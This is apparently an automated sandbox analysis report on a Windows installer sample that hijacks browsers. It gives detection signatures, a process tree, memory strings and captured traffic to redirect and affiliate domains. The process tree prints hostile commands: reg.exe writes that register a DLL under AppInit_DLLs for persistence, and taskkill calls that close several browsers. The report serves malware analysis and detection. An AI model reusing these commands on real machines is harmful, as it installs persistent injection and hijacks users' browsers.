Edit tour

Windows Analysis Report
$RDGU87D.exe

Overview

General Information

Sample Name:	$RDGU87D.exe
Analysis ID:	831395
MD5:	c91fcaa707b9e46828d867a4d399f6b2
SHA1:	eabe1a499a663b74d7b80fd0dec99b103d957697
SHA256:	1d180bd0d9a05b4c3883b99fcf9b5502bf30b35b2e09d4ba4ab2111079b3221e
Infos:

Detection

Score:	40
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Uses cmd line tools excessively to alter registry or file data

Checks if browser processes are running

Obfuscated command line found

Creates an undocumented autostart registry key

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

$RDGU87D.exe (PID: 1764 cmdline: C:\Users\user\Desktop\$RDGU87D.exe MD5: C91FCAA707B9E46828D867A4D399F6B2)

$RDGU87D.tmp (PID: 1184 cmdline: "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" MD5: 4193A1BA05847842590BE08BEC38CC72)

$RDGU87D.exe (PID: 1120 cmdline: "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT MD5: C91FCAA707B9E46828D867A4D399F6B2)

$RDGU87D.tmp (PID: 2692 cmdline: "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT MD5: 4193A1BA05847842590BE08BEC38CC72)

taskkill.exe (PID: 1560 cmdline: "taskkill" /F /IM msedge.exe /T MD5: 3722FA501DCB50AE42818F9034906891)

taskkill.exe (PID: 764 cmdline: "taskkill" /F /IM chrome.exe /T MD5: 3722FA501DCB50AE42818F9034906891)

taskkill.exe (PID: 1444 cmdline: "taskkill" /F /IM vivaldi.exe /T MD5: 3722FA501DCB50AE42818F9034906891)

taskkill.exe (PID: 2128 cmdline: "taskkill" /F /IM opera.exe /T MD5: 3722FA501DCB50AE42818F9034906891)

taskkill.exe (PID: 2064 cmdline: "taskkill" /F /IM brave.exe /T MD5: 3722FA501DCB50AE42818F9034906891)

cmd.exe (PID: 2672 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

reg.exe (PID: 2472 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

chrome.exe (PID: 2476 cmdline: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php MD5: 6ACAE527E744C80997B25EF2A0485D5E)

xcopy.exe (PID: 2544 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

chrome.exe (PID: 1184 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8 MD5: 6ACAE527E744C80997B25EF2A0485D5E)

xcopy.exe (PID: 2264 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe "-180126430115798039051631232828-2691859771612897714135344637115556289411055654796" MD5: CE476F23405AADC46039AC13127DF473)

xcopy.exe (PID: 1664 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\rY3YrAQjOUXa" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

xcopy.exe (PID: 3668 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

xcopy.exe (PID: 3860 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

xcopy.exe (PID: 3952 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\Odx9a70VBK1g" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

xcopy.exe (PID: 1160 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\EqwqqQBb6Hr3" MD5: 20CF8728C55A8743AAC86FB8D30EA898)

cleanup

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 12:20:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab626bade183826-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	String found in binary or memory: http://creativecommons.org/ns#
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://ocsps.ssl.com0
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	String found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	String found in binary or memory: http://www.inkscape.org/)
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	String found in binary or memory: http://www.inkscape.org/namespaces/inkscape
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: $RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.com
Source: $RDGU87D.exe, 00000001.00000003.914790721.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.com$https://chrome.com$https://chrome.com
Source: $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.com1R
Source: $RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.com9P
Source: $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.comiR
Source: $RDGU87D.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.dr	String found in binary or memory: https://searchesmia.com/bingchr4?q=
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.dr	String found in binary or memory: https://smashaff.com/redirect?&url=
Source: $RDGU87D.tmp, 00000004.00000003.931574561.0000000002046000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com
Source: $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.php
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000036B000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.php-1
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.php2F
Source: $RDGU87D.tmp, 00000004.00000003.932595838.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933214226.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.phpA
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.phpL
Source: $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.phpO
Source: $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.phpl
Source: $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smashbrowser.com/welcome2.url
Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.dr	String found in binary or memory: https://www.innosetup.com/
Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.dr	String found in binary or memory: https://www.remobjects.com/ps
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=WP.289365

Source: unknown

DNS traffic detected: queries for: ocsps.ssl.com

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /welcome2.php HTTP/1.1Host: smashbrowser.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?key=pvwarw3 HTTP/1.1Host: exturl.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /redirect.php HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=jsonp&callback=getIP HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js15_as.js HTTP/1.1Host: s10.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offerszzzz.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offersss.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@w HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offerszzzz.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offersss.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
